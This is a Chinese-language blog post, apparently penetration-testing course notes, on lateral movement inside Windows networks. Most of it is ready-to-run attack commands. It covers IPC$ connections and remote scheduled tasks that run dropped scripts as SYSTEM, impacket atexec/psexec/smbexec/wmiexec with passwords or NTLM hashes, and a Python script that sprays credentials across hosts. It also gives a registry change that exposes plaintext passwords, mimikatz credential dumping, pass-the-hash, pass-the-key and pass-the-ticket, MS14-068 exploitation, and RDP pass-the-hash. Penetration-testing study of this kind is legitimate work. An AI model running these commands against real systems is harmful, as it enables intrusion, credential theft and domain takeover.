<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    

<script>!function(){var e=window.matchMedia&&window.matchMedia("(prefers-color-scheme: dark)").matches,t=localStorage.getItem("use-color-scheme")||"auto";("dark"===t||e&&"light"!==t)&&document.documentElement.classList.toggle("dark",!0)}()</script>

<meta charset="utf-8" >

<title>横向移动</title>
<meta name="keywords" content="横向移动, R0seW1thH3r">
<meta name="description" content="横向移动by小迪">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/style/main.css">


<link rel="stylesheet" href="/style/jquery.fancybox.min.css">




    <link rel="stylesheet" href="/style/prism.css"/>




  <meta name="generator" content="Hexo 6.1.0"></head>
  <body>
    <div id="app" class="main">

<div class="site-header-container">
  <div class="site-header">
    <div class="left">
      <a href="https://R0seW1thH3r.github.io/archives">
        <img class="avatar" src="/images/avatar.png" alt="logo" width="32px" height="32px">
      </a>
      <a href="https://R0seW1thH3r.github.io/archives">
        <h1 class="site-title">R0seW1thH3r</h1>
      </a>
    </div>
    <div class="right">
        <i class="icon menu-switch icon-menu-outline" ></i>
    </div>
  </div>
</div>

<div class="menu-container" style="height: 0;opacity: 0;">
<nav class="menu-list">
  
    
      <a href="/archives" class="menu purple-link">
        首页
      </a>
    
  
    
      <a href="/tags" class="menu purple-link">
        标签
      </a>
    
  
    
      <a href="/about" class="menu purple-link">
        关于
      </a>
    
  
</nav>
</div>



  <div class="content-container">
    <div class="post-detail">
      
      <h2 class="post-title">横向移动</h2>
      <div class="post-info post-detail-info">
        <span><i class="icon icon-calendar-outline"></i> 2022-08-06</span>
        
          <span>
          <i class="icon icon-pricetags-outline"></i>
            
              <a href="/tags/%E5%86%85%E7%BD%91/">
              内网
                
              </a>
            
          </span>
        
      </div>
      <div class="post-content-wrapper">
        <div class="post-content">
          <h1 id="at-amp-schtasks"><a href="#at-amp-schtasks" class="headerlink" title="at&amp;schtasks"></a>at&amp;schtasks</h1><p>在拿下一台内网主机后，通过本地信息搜集收集用户凭证等信息后，如何横向渗透拿下更多的主机？</p>
<p>在已知目标系统的用户明文密码的基础上，直接可以在远程主机上执行命令。</p>
<p>获取到某域主机权限 –&gt; minikatz得到密码（明文，hash）–&gt; 用到信息收集里面域用户的列表做用户名字典 –&gt; 用到密码明文当做密码字典 –&gt; 尝试连接 –&gt; 创建计划任务(at|schtasks) –&gt; 执行文件（后门或命令）</p>
<p>利用流程：</p>
<ol>
<li>建立IPC连接到目标主机</li>
<li>拷贝要执行的命令脚本或木马到目标主机</li>
<li>查看目标时间，创建计划任务定时执行脚本</li>
<li>删除IPC连接</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">#建立IPC连接
net use \\10.1.1.1\IPC$ &quot;passwd&quot; &#x2F;user:username  #工作组
net use \\10.1.1.1\IPC$ &quot;passwd&quot; &#x2F;user:domainname\username  #域

dir \\10.1.1.1\c$\					#查看文件列表
copy \\10.1.1.1\c$\1.bat 1.bat 		#下载文件
copy 1.bat \\10.1.1.1\c$			#上传文件
net use \\10.1.1.1\IPC$ &#x2F;del		#删除IPC连接
net view 10.1.1.1					#查看对方共享

建立IPC失败的原因：
1. 目标系统不是NT或以上的操作系统
2. 对方没有打开IPC$共享
3. 对方未开启139、445端口，或者被防火墙屏蔽
4. 账号密码错了<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h2 id="at"><a href="#at" class="headerlink" title="at"></a>at</h2><p><code>&lt;Windows2012</code></p>
<p>建立ipc连接，然后把执行文件copy上去，再使用at命令添加计划任务。</p>
<pre class="line-numbers language-none"><code class="language-none">at \\10.1.1.1\ 11:30 C:\hh.bat
at \\10.1.1.1    1 &#x2F;delete
&#x2F;&#x2F; 1为计划任务的ID<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>



<h2 id="schtasks"><a href="#schtasks" class="headerlink" title="schtasks"></a>schtasks</h2><p><code>&gt;=windows2012</code></p>
<p>建立ipc连接，然后把执行文件copy上去，再使用schtasks命令添加计划任务。</p>
<pre class="line-numbers language-none"><code class="language-none">#在10.1.1.1创建任务名为adduser，每天执行的，文件路径为C:\add.bat的任务
schtasks &#x2F;create &#x2F;s 10.1.1.1 &#x2F;ru &quot;SYSTEM&quot; &#x2F;tn adduser &#x2F;sc DAILY &#x2F;tr C:\add.bat &#x2F;F

#运行adduser任务
schtasks &#x2F;run &#x2F;s 10.1.1.1 &#x2F;tn adduser &#x2F;i

#删除adduser任务
schtasks &#x2F;delete &#x2F;s 10.1.1.1 &#x2F;tn adduser &#x2F;f<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h2 id="atexec-impacket"><a href="#atexec-impacket" class="headerlink" title="atexec-impacket"></a>atexec-impacket</h2><p>可以看到以上两种方法都是明文密码，但是我们信息搜集的时候可能会得到hash值，就没有办法去连接。这里使用一款工具<code>impacket</code>里的<code>atexec</code>。</p>
<p>可以直接使用命令，但是不免杀。</p>
<pre class="line-numbers language-none"><code class="language-none">atexec.exe administrator:666.com@10.1.1.1 &quot;whoami&quot;
atexec.exe ZJ&#x2F;administrator:666.com@10.1.1.1 &quot;whoami&quot;
atexec.exe -hashes :6f8a61c6702f90ae246aa2a298fcdc35333 administrator@10.1.1.1 &quot;whoami&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>



<h2 id="批量利用"><a href="#批量利用" class="headerlink" title="批量利用"></a>批量利用</h2><p>俭朴版：</p>
<pre class="line-numbers language-none"><code class="language-none">#扫到存活ip后保存在一个ips.txt的文件,pass.txt、hash.txt是由mimikatz来的.

FOR &#x2F;F %%i in (ips.txt) do net use \\%%i\IPC$ &quot;666.com&quot; &#x2F;user:administrator	#变量ip

FOR &#x2F;F %%i in (ips.txt) do atexec.exe .&#x2F;administrator:666.com@%%i &quot;whoami&quot;	#变量ip

FOR &#x2F;F %%i in (pass.txt) do atexec.exe .&#x2F;administrator:%%i@10.1.1.1 &quot;whoami&quot; #变量pass

FOR &#x2F;F %%i in (hash.txt) do atexec.exe -hashes :%%i .&#x2F;administrator@10.1.1.1 &quot;whoami&quot; #变量hash <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>升级版：</p>
<p>写脚本，把ip、passwd、username都变三重循环。</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> os<span class="token punctuation">,</span>time
ips<span class="token operator">=</span><span class="token punctuation">&#123;</span>
    <span class="token string">'10.1.1.1'</span><span class="token punctuation">,</span>
    <span class="token string">'10.1.1.2'</span>
<span class="token punctuation">&#125;</span>

users<span class="token operator">=</span><span class="token punctuation">&#123;</span>
    <span class="token string">'jiarong.gao'</span><span class="token punctuation">,</span>
    <span class="token string">'ping.fang'</span>
<span class="token punctuation">&#125;</span>

passwd<span class="token operator">=</span><span class="token punctuation">&#123;</span>
    <span class="token string">'666.com'</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">for</span> ip <span class="token keyword">in</span> ips<span class="token punctuation">:</span>
    <span class="token keyword">for</span> user <span class="token keyword">in</span> users<span class="token punctuation">:</span>
        <span class="token keyword">for</span> mima <span class="token keyword">in</span> passwd<span class="token punctuation">:</span>
        	payld<span class="token operator">=</span><span class="token string">"net use \\"</span><span class="token operator">+</span> "\"<span class="token operator">+</span>ip<span class="token operator">+</span><span class="token string">'\ipc$ '</span><span class="token operator">+</span>mima<span class="token operator">+</span><span class="token string">' /user:'</span><span class="token operator">+</span>user
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'--->'</span><span class="token operator">+</span>payld<span class="token operator">+</span><span class="token string">'&lt;---'</span><span class="token punctuation">)</span>
            os<span class="token punctuation">.</span>system<span class="token punctuation">(</span>payld<span class="token punctuation">)</span>
            time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong>将py文件变成exe文件：</strong></p>
<blockquote>
<p>D:\python\Scripts\pyinstaller.exe -F at_fuzz.py</p>
</blockquote>
<p>exe在dist文件夹里。</p>
<h1 id="psexec-amp-smbexec"><a href="#psexec-amp-smbexec" class="headerlink" title="psexec&amp;smbexec"></a>psexec&amp;smbexec</h1><p>win2012以上版本默认关闭wdigest，攻击者无法从内存中获取明文密码。</p>
<p>win2012一下版本若安装KB2871997补丁，同样也会导致无法获取明文密码。</p>
<p>针对以上情况，有以下解决方案：</p>
<ol>
<li>利用哈希hash传递（pth，ptk等）进行移动</li>
<li>利用其他服务协议（SMB，WMI等）进行哈希移动</li>
<li>利用注册表操作开启Wdigest Auth值进行获取明文</li>
<li>利用工具或第三方平台（Hashcat）进行破解获取明文</li>
</ol>
<p>windows系统LM Hash及NTLM Hash加密算法，个人系统在Windows vista后，服务器系统在Windows2003以后，认证方式均为NTLM Hash。</p>
<p><strong>注册表修改</strong></p>
<pre class="line-numbers language-none"><code class="language-none">reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest &#x2F;v UseLogonCredential &#x2F;t REG_DWORD &#x2F;d 1 &#x2F;f<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h2 id="psexec"><a href="#psexec" class="headerlink" title="psexec"></a>psexec</h2><p>第一种：先建立IPC连接，再使用psexec（需要明文或hash传递）</p>
<pre class="line-numbers language-none"><code class="language-none">net use \\10.1.1.1\IPC$ &quot;666.com&quot; &#x2F;user:administrator
psexec \\10.1.1.1 -s cmd           #-s以System运行<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>第二种：不建立IPC连接。</p>
<pre class="line-numbers language-none"><code class="language-none">psexec \\10.1.1.1 -u administrator -p 666.com -s cmd
psexec -hashes :$HASH$ .&#x2F;administrator@10.1.1.1 
psexec -hashes :$HASH$ domain&#x2F;administrator@10.1.1.1 
psexec -hashes :6f8a61c6702f90ae246aa2a298fcdc35 .&#x2F;administrator@10.1.1.1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>使用hashes传递时可能会出错，我们可以使用impacket工具包里的psexec，这个是基于官方的psexec二次开发的，可以进行hash的传递。但是容易被杀。</p>
<h2 id="smbexec"><a href="#smbexec" class="headerlink" title="smbexec"></a>smbexec</h2><p>也是impacket工具包的一个软件。</p>
<p>不用IPC连接</p>
<pre class="line-numbers language-none"><code class="language-none">smbexec ZJ&#x2F;administrator:666.com@10.1.1.1
smbexec .&#x2F;administrator:666.com@10.1.1.1
smbexec -hashes :6f8a61c6702f90ae246aa2a298fcdc35 ZJ&#x2F;administrator@10.1.1.1
smbexec -hashes :6f8a61c6702f90ae246aa2a298fcdc35 .&#x2F;administrator@10.1.1.1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>



<h1 id="wmic-amp-wmiexec"><a href="#wmic-amp-wmiexec" class="headerlink" title="wmic&amp;wmiexec"></a>wmic&amp;wmiexec</h1><p>WMI是通过<strong>135</strong>端口进行利用。支持用户名明文或者hash的方式进行认证，并且该方法不会在目标日志系统留下痕迹。需要提权。</p>
<p>#自带WMIC 明文传递 无回显</p>
<pre class="line-numbers language-none"><code class="language-none">wmic &#x2F;node:10.1.1.1 &#x2F;user:administrator &#x2F;password:666.com process call create &quot;cmd.exe &#x2F;c ipconfig &gt;C:\1.txt&quot;
命令结果在1.txt里，且保存在10.1.1.1的电脑里。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>#自带cscript明文传输 有回显</p>
<pre class="line-numbers language-none"><code class="language-none">cscript &#x2F;&#x2F;nologo wmiexec.vbs &#x2F;shell 10.1.1.1 administrator 666.com<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>#套件impacket的wmiexec  明文或hash传递 有回显exe版本</p>
<pre class="line-numbers language-none"><code class="language-none">wmiexec .&#x2F;administrator:666.com@10.1.1.1 &quot;whoami&quot;
wmiexec ZJ&#x2F;administrator:666.com@10.1.1.1 &quot;whoami&quot;
wmiexec -hashes :6f8a61c6702f90ae246aa2a298fcdc35 .&#x2F;administrator@10.1.1.1 &quot;whoami&quot;
wmiexec -hashes :6f8a61c6702f90ae246aa2a298fcdc35 ZJ&#x2F;administrator@10.1.1.1 &quot;whoami&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>



<h1 id="PTH-amp-PTT-amp-PTK"><a href="#PTH-amp-PTT-amp-PTK" class="headerlink" title="PTH&amp;PTT&amp;PTK"></a>PTH&amp;PTT&amp;PTK</h1><ul>
<li>PTH(pass the hash)		#利用LM或NTLM的值进行的渗透测试</li>
<li>PTT(pass the ticket)        #利用的票据凭证TGT进行的渗透测试</li>
<li>PTK(pass the key)            #利用的AES-256进行的渗透测试</li>
</ul>
<p>PTH在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过LM Hash和NTLM hash访问远程主机或服务，而不用提供明文密码。</p>
<p>如果禁用了NTLM认证。PsExec无法利用获得的ntlm hash进行远程连接，但是使用mimikatz还是可以攻击成功。对于8.1&#x2F;2012r2，安装补丁kb2871997的Win7&#x2F;2009r2&#x2F;8&#x2F;2012等，可以使用AES keys代替NT hash 来实现PTK攻击。</p>
<p>pth：没打补丁域用户和本地administrator可以连接，打了补丁也没啥影响。</p>
<p>ptk：打了补丁才能用户才可以连接，采用AES256连接。</p>
<h2 id="PTH"><a href="#PTH" class="headerlink" title="PTH"></a>PTH</h2><p>ntlm 传递，工具：mimikatz</p>
<p>首先用mimikatz得到ntlm值。</p>
<pre class="line-numbers language-none"><code class="language-none">privilege::debug
sekurlsa::logonpasswords<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>未打补丁的工作组及域连接：</p>
<pre class="line-numbers language-none"><code class="language-none">privilege::debug
sekurlsa::pth &#x2F;user:administrator &#x2F;domain:zj &#x2F;ntlm:6f8a61c6702f90ae246aa2a298fcdc35
sekurlsa::pth &#x2F;user:administrator &#x2F;domain:workgroup &#x2F;ntlm:6f8a61c6702f90ae246aa2a298fcdc35<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>然后会弹出一个cmd窗口，可以直接进行连接。</p>
<pre class="line-numbers language-none"><code class="language-none">net use \\10.1.1.1\IPC$
dir \\10.1.1.1\c$<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>



<h2 id="PTK"><a href="#PTK" class="headerlink" title="PTK"></a>PTK</h2><p>打了补丁<strong>kb2871997</strong>才能用</p>
<p>首先要得到AES256的值，mimikatz：</p>
<pre class="line-numbers language-none"><code class="language-none">privilege::debug
sekurlsa::ekeys

sekurlsa::pth &#x2F;user:administrator &#x2F;domain:zj.com &#x2F;aes256:6f88e6d06c3ecb95e37fe23b3ef372738ec67871b71606c588a1668ca62161ac<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>



<h2 id="PTT"><a href="#PTT" class="headerlink" title="PTT"></a>PTT</h2><p><strong>第一种</strong>利用漏洞：</p>
<p>能实现普通用户直接获取域控system权限</p>
<p>#MS14-068 powershell执行</p>
<p>1.查看当前sid </p>
<pre class="line-numbers language-none"><code class="language-none">whoami &#x2F;user<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>2.mimikaz   </p>
<pre class="line-numbers language-none"><code class="language-none">kerberos::purge			&#x2F;&#x2F;清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造。
kerberos::list			&#x2F;&#x2F;查看当前机器凭证
kerberos::ptc 票据文件	 &#x2F;&#x2F;将票据注入到内存中<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>3.利用MS14-068生成TGT数据</p>
<pre class="line-numbers language-none"><code class="language-none">ms14-068.exe -u 域成员名@域名 -s sid -d 域控地址 -p 域成员密码
MS14-068.exe -u jiarong.gao@zj.com -s S-1-5-21-3032773461-2117130829-2438403642-1103 -d 10.1.1.1 -p 666.com<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>4.票据注入内存</p>
<pre class="line-numbers language-none"><code class="language-none">mimikatz.exe &quot;kerberos::ptc TGT_mary@zj.com.ccache&quot; exit<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>5.查看凭证列表</p>
<pre class="line-numbers language-none"><code class="language-none">klist<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>6.利用</p>
<pre class="line-numbers language-none"><code class="language-none">dir \\10.1.1.1\c$<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>第二种</strong>利用工具kekeo</p>
<p>1.生成票据</p>
<pre class="line-numbers language-none"><code class="language-none">kekeo &quot;tgt::ask &#x2F;user:jiarong.gao &#x2F;domain:zj.com &#x2F;ntlm:6f8a61c6702f90ae246aa2a298fcdc35&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>2.导入票据</p>
<pre class="line-numbers language-none"><code class="language-none">kerberos::ptt 票据名<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>2.查看凭证</p>
<pre class="line-numbers language-none"><code class="language-none">klist<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>4.利用net use 载入</p>
<pre class="line-numbers language-none"><code class="language-none">dir \\10.1.1.1\c$<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>第三种</strong>利用本地票据（管理员权限）、</p>
<pre class="line-numbers language-none"><code class="language-none">sekurlsa::tickets &#x2F;export
kerberos::ptt xxxxxxxx.xxxx.kirbi<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>



<h1 id="RDP"><a href="#RDP" class="headerlink" title="RDP"></a>RDP</h1><p>与linux的ssh协议类似，这是windows的远程桌面连接（图形）的协议，端口为<strong>3389</strong></p>
<p>RDP明文密码连接</p>
<pre class="line-numbers language-none"><code class="language-none">windows:	mstsc
mstsc.exe &#x2F;console &#x2F;v:10.1.1.1 &#x2F;administrator

linux: rdesktop 10.1.1.1:3389<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>RDP密文HASH链接</p>
<p>windows Server需要开启 Restricted Admin mode，在Windows 8.1和Windows Server 2012 R2中默认开启，同时如果Win7 和Windows Server 2008 R2安装了KB2871997、KB2973351补丁也支持。</p>
<p>开启命令：</p>
<pre class="line-numbers language-none"><code class="language-none">REG ADD &quot;HKLM\System\CurrentControlSet\Control\Lsa&quot; &#x2F;v DisableRestrictedAdmin &#x2F;t REG_DWORD &#x2F;d 00000000 &#x2F;f<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>然后：</p>
<pre class="line-numbers language-none"><code class="language-none">mstsc.exe &#x2F;restrictedadmin
mimikatz.exe
privilege::debug
sekurlsa::pth &#x2F;user:administrator &#x2F;domain:zj &#x2F;ntlm:6f8a61c6702f90ae246aa2a298fcdc35 &quot;&#x2F;run:mstsc.exe &#x2F;restrictedadmin&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>



<hr>

        </div>
        <div class="top-div">
          <ol class="top-box"><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#at-amp-schtasks"><span class="top-box-text">at&amp;schtasks</span></a><ol class="top-box-child"><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#at"><span class="top-box-text">at</span></a></li><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#schtasks"><span class="top-box-text">schtasks</span></a></li><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#atexec-impacket"><span class="top-box-text">atexec-impacket</span></a></li><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#%E6%89%B9%E9%87%8F%E5%88%A9%E7%94%A8"><span class="top-box-text">批量利用</span></a></li></ol></li><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#psexec-amp-smbexec"><span class="top-box-text">psexec&amp;smbexec</span></a><ol class="top-box-child"><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#psexec"><span class="top-box-text">psexec</span></a></li><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#smbexec"><span class="top-box-text">smbexec</span></a></li></ol></li><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#wmic-amp-wmiexec"><span class="top-box-text">wmic&amp;wmiexec</span></a></li><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#PTH-amp-PTT-amp-PTK"><span class="top-box-text">PTH&amp;PTT&amp;PTK</span></a><ol class="top-box-child"><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#PTH"><span class="top-box-text">PTH</span></a></li><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#PTK"><span class="top-box-text">PTK</span></a></li><li class="top-box-item top-box-level-2"><a class="top-box-link" href="#PTT"><span class="top-box-text">PTT</span></a></li></ol></li><li class="top-box-item top-box-level-1"><a class="top-box-link" href="#RDP"><span class="top-box-text">RDP</span></a></li></ol>
        </div>
      </div>
    </div>

    
      <div class="next-post">
        <a class="purple-link" href="/2022/08/06/%E6%9C%AC%E5%9C%B0%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">
          <h3 class="post-title">
            下一篇：本地信息搜集
          </h3>
        </a>
      </div>
    
  </div>




<footer>
<div class="site-footer">
  <div class="social-container">
    
      
    
      
    
      
    
      
    
      
    
  </div>
  
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> <a href="https://github.com/f-dong/hexo-theme-minimalism" target="_blank">Theme</a>
  
  
  
  
  
  
</div>
</footer>


      </div>
      
    <script src="/js/jquery.min.js"></script>
    <script src="/js/jquery.fancybox.min.js"></script>


<script id="hexo-configurations">
    window.theme_config = {"image":{"lazyload_enable":false}};
    window.is_post = true;
  </script>

<script src="/js/main.js"></script>





    </div>
  </body>
</html>

